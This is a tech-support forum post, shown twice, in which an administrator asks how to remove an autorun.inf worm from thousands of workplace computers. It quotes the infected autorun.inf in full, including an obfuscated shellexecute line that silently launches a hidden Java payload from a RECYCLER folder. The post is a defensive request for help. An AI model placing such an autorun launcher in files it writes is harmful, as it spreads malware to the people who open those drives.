hmig89
Active Member
- Reaction score
- 5
- Location
- Sittingbourne, Kent
Hi All,
I am running into an issue, a number of desktops and laptops (in the 1000's) have the autorun.inf virus. All the drive icons appear as folders, when a user opens either their C: or shared drive it opens a cmd window which closes by itself. Looks like it maybe some kind of java exploit too?
If I open the autorun.inf in notepad it has the following contents:
[ autorUN ]
ACtIOn =Open folder to view files
ICon=%SySTemRoOt%\sYStEM32\SHELL32.dlL,4
sHelLExECUTe =cmd.exE /q /c eXPLOREr.exe . & StART /I /B "" JAvAW.eXE -classpath "RECYCLER\S-6-3-92-7181272086-2272571398-1241750246-7865\qeseoeg.QUS" a
Different PCs load different files, so instead of qeseoeg.QUS it can be emiu.wew
I have thrown combofix with this that works, but how do I manage this on such a large scale number of devices? I am wondering if I can figure out where the worm is coming from ie another PC or server? Maybe im approaching this the wrong way?
Appreciate any help.
Thanks
I am running into an issue, a number of desktops and laptops (in the 1000's) have the autorun.inf virus. All the drive icons appear as folders, when a user opens either their C: or shared drive it opens a cmd window which closes by itself. Looks like it maybe some kind of java exploit too?
If I open the autorun.inf in notepad it has the following contents:
[ autorUN ]
ACtIOn =Open folder to view files
ICon=%SySTemRoOt%\sYStEM32\SHELL32.dlL,4
sHelLExECUTe =cmd.exE /q /c eXPLOREr.exe . & StART /I /B "" JAvAW.eXE -classpath "RECYCLER\S-6-3-92-7181272086-2272571398-1241750246-7865\qeseoeg.QUS" a
Different PCs load different files, so instead of qeseoeg.QUS it can be emiu.wew
I have thrown combofix with this that works, but how do I manage this on such a large scale number of devices? I am wondering if I can figure out where the worm is coming from ie another PC or server? Maybe im approaching this the wrong way?
Appreciate any help.
Thanks
Last edited:
